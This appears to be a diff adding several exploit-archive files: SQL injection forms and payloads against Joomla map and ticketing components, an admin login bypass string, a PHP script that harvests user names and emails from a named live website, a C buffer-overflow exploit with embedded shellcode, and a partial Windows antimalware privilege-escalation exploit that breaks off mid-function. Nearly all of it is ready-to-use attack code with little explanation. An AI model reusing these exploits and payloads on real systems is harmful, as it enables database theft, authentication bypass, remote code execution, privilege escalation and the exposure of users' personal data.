+<html>
+<body>
+<!--com_zhbaidumap/controller.php-->
+
+<!--# 1)-->
+<!--L 27: public function getPlacemarkDetails() {........}-->
+<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
+<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
+<input type="submit" value="1-Ver Ayari">
+</form>
+
+<!--# 2)-->
+<!--L 356: public function getPlacemarkHoverText() {........}-->
+<form action="http://localhost/Joomla375/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkHoverText" method="post">
+<input name="id" value="-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,/*!02222CONCAT*/((/*!02222SELECT*/(@x)/*!02222FROM*/(/*!02222SELECT*/(@x:=0x00),(@NR:=0),(/*!02222SELECT*/(0)/*!02222FROM*/(INFORMATION_SCHEMA.TABLES)/*!02222WHERE*/(TABLE_SCHEMA!=0x696e226f726d6174696f6e5f736368656d61)/*!02222AND*/(0x00)IN(@x:=/*!02222CONCAT*/(@x,/*!02222LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22--" type="hidden">
+<input type="submit" value="2-Ver Ayari">
+</form>
+
+<!--# 3)-->
+<!--L 411: public function getPathHoverText() {........}-->
+<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathHoverText" method="post">
+<input name="id" value="-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,/*!03333CONCAT*/((/*!03333SELECT*/(@x)/*!03333FROM*/(/*!03333SELECT*/(@x:=0x00),(@NR:=0),(/*!03333SELECT*/(0)/*!03333FROM*/(INFORMATION_SCHEMA.TABLES)/*!03333WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!03333AND*/(0x00)IN(@x:=/*!03333CONCAT*/(@x,/*!03333LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--" type="hidden">
+<input type="submit" value="3-Ver Ayari">
+</form>
+
+<!--# 4)-->
+<!--L 756: public function getPathDetails() {........}-->
+<form action="http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathDetails" method="post">
+<input name="id" value="-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,/*!04444CONCAT*/((/*!04444SELECT*/(@x)/*!04444FROM*/(/*!04444SELECT*/(@x:=0x00),(@NR:=0),(/*!04444SELECT*/(0)/*!04444FROM*/(INFORMATION_SCHEMA.TABLES)/*!04444WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!04444AND*/(0x00)IN(@x:=/*!04444CONCAT*/(@x,/*!04444LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--" type="hidden">
+<input type="submit" value="4-Ver Ayari">
+</form>
+
+</body>
+</html>

exploits/php/webapps/43975.html

@@ -0,0 +1,40 @@
+<!--
+# # # # #
+# Exploit Title: Joomla! Component Zh YandexMap 6.2.1.0 - SQL Injection
+# Dork: N/A
+# Date: 04.02.2018
+# Vendor Homepage: http://zhuk.cc/
+# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-yandexmap/
+# Software Download: http://zhuk.cc/files/pkg_zhyandexmap-j30-6.2.1.0-final.zip
+# Version: 6.2.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6604
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# Want To Donate ?
+# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
+# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# # # # #
+-->
+<html>
+<body>
+<!--com_zhyandexmap/controller.php-->
+
+<!--# 1)-->
+<!--L 29: public function getPlacemarkDetails() {........}-->
+<form action="http://localhost/[PATH]/index.php?option=com_zhyandexmap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
+<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
+<input type="submit" value="1-Ver Ayari">
+</form>
+
+</body>
+</html>

exploits/php/webapps/43976.txt

@@ -0,0 +1,61 @@
+<!--
+# # # # #
+# Exploit Title: Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection
+# Dork: N/A
+# Date: 04.02.2018
+# Vendor Homepage: http://zhuk.cc/
+# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-googlemap/
+# Software Download: http://zhuk.cc/files/pkg_zhgooglemap-j30-8.4.0.0-final.zip
+# Version: 8.4.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6582
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# Want To Donate ?
+# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
+# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# # # # #
+-->
+<html>
+<body>
+<!--com_zhgooglemap/controller.php-->
+
+<!--# 1)-->
+<!--L 30: public function getPlacemarkDetails() {........}-->
+<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkDetails" method="post">
+<input name="id" value="-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--" type="hidden">
+<input type="submit" value="1-Ver Ayari">
+</form>
+
+<!--# 2)-->
+<!--L 363: public function getPlacemarkHoverText() {........}-->
+<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkHoverText" method="post">
+<input name="id" value="-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22--" type="hidden">
+<input type="submit" value="2-Ver Ayari">
+</form>
+
+<!--# 3)-->
+<!--L 418: public function getPathHoverText() {........}-->
+<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathHoverText" method="post">
+<input name="id" value="-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e336f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--" type="hidden">
+<input type="submit" value="3-Ver Ayari">
+</form>
+
+<!--# 4)-->
+<!--L 763: public function getPathDetails() {........}-->
+<form action="http://localhost/[PATH]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPathDetails" method="post">
+<input name="id" value="-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--" type="hidden">
+<input type="submit" value="4-Ver Ayari">
+</form>
+
+</body>
+</html>

exploits/php/webapps/43977.php

@@ -0,0 +1,40 @@
+<?php
+# # # # # 
+# Exploit Title: Joomla! Component jLike 1.0 - Information Leakage
+# Dork: N/A
+# Date: 04.02.2018
+# Vendor Homepage: http://joomlaserviceprovider.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/social-web/social-share/jlike/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6610
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# Want To Donate ? 
+# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
+# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
+# # # # #
+# Description:
+# Information Leakage
+# 
+# Proof of Concept: 
+# 
+# 1)
+header ('Content-type: text/html; charset=UTF-8');
+$url= "http://www.projectcontrolsinstitute.com/";
+$p="index.php?option=com_jlike&task=getUserByCommentId&tmpl=component&format=row";
+$url = file_get_contents($url.$p);
+$l = json_decode($url, true);
+if($l){
+	echo "*-----------------------------*<br />";
+foreach($l as $u){
+	echo "[-] ID\n\n\n\n:\n" .$u['id']."<br />";
+	echo "[-] Name\n\n:\n" .$u['name']."<br />";
+	echo "[-] Email\n:\n" .$u['email']."<br />";
+	echo "<br>";
+}echo "*-----------------------------*";} 
+else{echo "[-] No user";}
+?>

exploits/php/webapps/43978.txt

@@ -0,0 +1,91 @@
+# # # # # 
+# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection
+# Dork: N/A
+# Date: 04.02.2018
+# Vendor Homepage: http://joomlaserviceprovider.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6609
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# Want To Donate ? 
+# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
+# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]
+# 
+# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari
+# 
+# Parameter: ticketcode (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe
+# 
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir
+# 
+#     Type: UNION query
+#     Title: Generic UNION query (NULL) - 29 columns
+#     Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG
+
+# 2)
+# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]
+# 
+# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+# 
+# 
+# Parameter: id (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325
+# 
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5)
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]
+# 
+# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+# 
+# Parameter: id (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454
+# 
+#     Type: error-based
+#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+#     Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 OR time-based blind
+#     Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5)
+# 
+# 4)
+# 
+# <form method="post" action="http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=display">
+# <input type="text" name="jform[guestemail]"...
+# <input type="text" name="jform[ticketid]"... 
+# <input type="submit" name="searchsubmit"...
+# </form>
+# 
+# # # # #

exploits/php/webapps/43980.txt

@@ -0,0 +1,19 @@
+# Exploit title: Student Profile Management System Script 2.0.6 - Admin
+Panel Authentication Bypass
+# Dork: "Powered by: i-Net Solution"
+# Date: 2018-02-06
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage:
+https://www.phpscriptsmall.com/product/studentstaff-profile-management-system/
+# Version: 2.0.6
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# With this exploit,Attacker can bypass admin panel Authentication.
+# # # # #
+# Proof of Concept:
+
+# username : anything
+# password : admin' or 'a'='a
+# admin panel login : /admin_login.php

exploits/windows/dos/42341.c

@@ -0,0 +1,121 @@
+#define _WINSOCK_DEPRECATED_NO_WARNINGS
+#define DEFAULT_BUFLEN 512
+
+#include <inttypes.h>
+#include <stdio.h>
+#include <winsock2.h>
+#include <windows.h>
+
+DWORD SendRequest(char *request, int request_size) {
+    WSADATA wsa;
+    SOCKET s;
+    struct sockaddr_in server;
+    char recvbuf[DEFAULT_BUFLEN];
+    int recvbuflen = DEFAULT_BUFLEN;
+    int iResult;
+
+    printf("\n[>] Initialising Winsock...\n");
+    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
+    {
+        printf("[!] Failed. Error Code : %d", WSAGetLastError());
+        return 1;
+    }
+
+    printf("[>] Initialised.\n");
+    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
+    {
+        printf("[!] Could not create socket : %d", WSAGetLastError());
+    }
+
+    printf("[>] Socket created.\n");
+    server.sin_addr.s_addr = inet_addr("172.16.116.222");
+    server.sin_family = AF_INET;
+    server.sin_port = htons(8080);
+
+    if (connect(s, (struct sockaddr *)&server, sizeof(server)) < 0)
+    {
+        puts("[!] Connect error");
+        return 1;
+    }
+    puts("[>] Connected");
+
+    if (send(s, request, request_size, 0) < 0)
+    {
+        puts("[!] Send failed");
+        return 1;
+    }
+    puts("\n[>] Request sent\n");
+    closesocket(s);
+    return 0;
+}
+
+void EvilRequest() {
+    
+    char request_one[] = "POST /login HTTP/1.1\r\n"
+                        "Host: 172.16.116.222\r\n"
+                        "User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
+                        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+                        "Accept-Language: en-US,en;q=0.5\r\n"
+                        "Referer: http://172.16.116.222/login\r\n"
+                        "Connection: close\r\n"
+                        "Content-Type: application/x-www-form-urlencoded\r\n"
+                        "Content-Length: ";
+    char request_two[] = "\r\n\r\nusername=";
+    
+    char *padding = malloc(780);
+    memset(padding, 0x41, 780);
+    memset(padding + 778, 0x00, 2);
+    unsigned char retn[] = "\xcb\x75\x52\x73"; //ret at msvbvm60.dll
+    
+    unsigned char shellcode[] = 
+    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP SLIDE
+    "\xdb\xda\xbd\x92\xbc\xaf\xa7\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
+    "\x52\x31\x68\x17\x83\xc0\x04\x03\xfa\xaf\x4d\x52\x06\x27\x13"
+    "\x9d\xf6\xb8\x74\x17\x13\x89\xb4\x43\x50\xba\x04\x07\x34\x37"
+    "\xee\x45\xac\xcc\x82\x41\xc3\x65\x28\xb4\xea\x76\x01\x84\x6d"
+    "\xf5\x58\xd9\x4d\xc4\x92\x2c\x8c\x01\xce\xdd\xdc\xda\x84\x70"
+    "\xf0\x6f\xd0\x48\x7b\x23\xf4\xc8\x98\xf4\xf7\xf9\x0f\x8e\xa1"
+    "\xd9\xae\x43\xda\x53\xa8\x80\xe7\x2a\x43\x72\x93\xac\x85\x4a"
+    "\x5c\x02\xe8\x62\xaf\x5a\x2d\x44\x50\x29\x47\xb6\xed\x2a\x9c"
+    "\xc4\x29\xbe\x06\x6e\xb9\x18\xe2\x8e\x6e\xfe\x61\x9c\xdb\x74"
+    "\x2d\x81\xda\x59\x46\xbd\x57\x5c\x88\x37\x23\x7b\x0c\x13\xf7"
+    "\xe2\x15\xf9\x56\x1a\x45\xa2\x07\xbe\x0e\x4f\x53\xb3\x4d\x18"
+    "\x90\xfe\x6d\xd8\xbe\x89\x1e\xea\x61\x22\x88\x46\xe9\xec\x4f"
+    "\xa8\xc0\x49\xdf\x57\xeb\xa9\xf6\x93\xbf\xf9\x60\x35\xc0\x91"
+    "\x70\xba\x15\x35\x20\x14\xc6\xf6\x90\xd4\xb6\x9e\xfa\xda\xe9"
+    "\xbf\x05\x31\x82\x2a\xfc\xd2\x01\xba\x8a\xef\x32\xb9\x72\xe1"
+    "\x9e\x34\x94\x6b\x0f\x11\x0f\x04\xb6\x38\xdb\xb5\x37\x97\xa6"
+    "\xf6\xbc\x14\x57\xb8\x34\x50\x4b\x2d\xb5\x2f\x31\xf8\xca\x85"
+    "\x5d\x66\x58\x42\x9d\xe1\x41\xdd\xca\xa6\xb4\x14\x9e\x5a\xee"
+    "\x8e\xbc\xa6\x76\xe8\x04\x7d\x4b\xf7\x85\xf0\xf7\xd3\x95\xcc"
+    "\xf8\x5f\xc1\x80\xae\x09\xbf\x66\x19\xf8\x69\x31\xf6\x52\xfd"
+    "\xc4\x34\x65\x7b\xc9\x10\x13\x63\x78\xcd\x62\x9c\xb5\x99\x62"
+    "\xe5\xab\x39\x8c\x3c\x68\x59\x6f\x94\x85\xf2\x36\x7d\x24\x9f"
+    "\xc8\xa8\x6b\xa6\x4a\x58\x14\x5d\x52\x29\x11\x19\xd4\xc2\x6b"
+    "\x32\xb1\xe4\xd8\x33\x90";
+
+    char request_three[] = "&password=A";
+
+    int buffer_length = strlen(request_one) + 780 + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three);
+    int content_length = 9 + 780 + strlen(retn) + strlen(shellcode) + strlen(request_three);
+    char *content_length_string = malloc(15);
+    sprintf(content_length_string, "%d", content_length);
+
+    char *buffer = malloc(buffer_length);
+    memset(buffer, 0x00, buffer_length);
+    strcpy(buffer, request_one);
+    strcat(buffer, content_length_string);
+    strcat(buffer, request_two);
+    strcat(buffer, padding);
+    strcat(buffer, retn);
+    strcat(buffer, shellcode);
+    strcat(buffer, request_three);
+
+    SendRequest(buffer, strlen(buffer));
+}
+
+int main() {
+
+    EvilRequest();
+    return 0;
+}

exploits/windows/local/43973.c

@@ -0,0 +1,207 @@
+/*
+Title			:	MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
+Date			:	02/02/2018
+Author			:	Souhail Hammou
+Vendor Homepage	:	https://www.malwarefox.com/
+Version			:	2.74.0.150
+Tested on		:	Windows 7 32-bit / Windows 10 64-bit
+CVE				:	CVE-2018-6593
+*/
+#include <Windows.h>
+#include <fltUser.h>
+#include <TlHelp32.h>
+#include <stdio.h>
+
+#pragma comment(lib,"FltLib.lib")
+
+BOOL RegisterProcessByCommunicationPort()
+{
+	HRESULT hResult;
+	HANDLE hPort;
+
+	/*
+	Improper access control :
+	The default DACL for the filter communication port is superseded allowing everyone to connect to the port:
+
+	.text:0000000140011987                 lea     rcx, [rbp+SecurityDescriptor]
+	.text:000000014001198B                 mov     edx, 1F0001h
+	.text:0000000140011990                 call    FltBuildDefaultSecurityDescriptor ;default SD only allows SYSTEM & Admins to connect
+	.text:0000000140011995                 test    eax, eax
+
+	[.........]
+
+	.text:00000001400119B1
+	.text:00000001400119B1 loc_1400119B1:                          ; CODE XREF: sub_140011890+107j
+	.text:00000001400119B1                 mov     rcx, [rbp+SecurityDescriptor] ; SecurityDescriptor
+	.text:00000001400119B5                 xor     r9d, r9d        ; DaclDefaulted
+	.text:00000001400119B8                 xor     r8d, r8d        ; Dacl
+	.text:00000001400119BB                 mov     dl, 1           ; DaclPresent
+	.text:00000001400119BD                 call    cs:RtlSetDaclSecurityDescriptor ; <= Vuln: SD's DACL pointer is set to NULL, granting access to everyone
+
+	Once connected to the port, the driver automatically registers the process
+	as trusted. This allows the process to issue IOCTL codes that couldn't be sent otherwise.
+	e.g. disable real-time protection, write to raw disk, open full access handles to processes ...etc
+	*/
+
+	hResult = FilterConnectCommunicationPort(
+		L"\\GLOBAL??\\ZAM_MiniFilter_CommPort",
+		0,
+		NULL,
+		0,
+		NULL,
+		&hPort);
+
+	if (hResult != S_OK)
+	{
+		return FALSE;
+	}
+	CloseHandle(hPort);
+	return TRUE;
+}
+
+DWORD GetWinlogonPID()
+{
+	DWORD WinlogonPid = 0;
+	PROCESSENTRY32 ProcessEntry;
+	ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
+
+	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	if (hSnapshot == INVALID_HANDLE_VALUE)
+	{
+		printf("[-] CreateToolhelp32Snapshot failed !\n");
+		goto ret;
+	}
+
+	if (!Process32First(hSnapshot, &ProcessEntry))
+	{
+		printf("[-] Process32First failed !\n");
+		goto cleanup;
+	}
+
+	do
+	{
+		if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
+		{
+			WinlogonPid = ProcessEntry.th32ProcessID;
+			break;
+		}
+	} while (Process32Next(hSnapshot, &ProcessEntry));
+
+cleanup:
+	CloseHandle(hSnapshot);
+ret:
+	return WinlogonPid;
+}
+int main(int argc, char** argv)
+{
+	DWORD BytesReturned;
+	DWORD winlogon_pid;
+	HANDLE winlogon_handle;
+	LPVOID RemoteAllocation;
+	HANDLE hDevice;
+
+	printf("===      MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation      ===\n");
+	printf("                              Tested on Windows 10 64-bit                                \n");
+	printf("                                   Souhail Hammou                                      \n\n");
+	printf("[*] Stage 1: Registering the process with the driver by connecting to the minifilter communication port\n");
+
+	hDevice = CreateFile
+		("\\\\.\\ZemanaAntiMalware",
+			GENERIC_READ | GENERIC_WRITE,
+			0,
+			NULL,
+			OPEN_EXISTING,
+			FILE_ATTRIBUTE_NORMAL,
+			NULL
+			);
+	if (hDevice == INVALID_HANDLE_VALUE)
+	{
+		return 0;
+	}
+
+
+	if (!RegisterProcessByCommunicationPort())
+	{
+		printf("\t[-] Registration Failed !\n");
+		return 0;
+	}
+
+	printf("\t[+] Process registered.\n[*] Stage 2: \n");
+
+	printf("\t[+] Getting Winlogon's PID\n");
+	winlogon_pid = GetWinlogonPID();
+
+	if (!winlogon_pid)
+	{
+		printf("\t[-] GetWinlogonPID() failed !\n");
+		return 0;
+	}
+
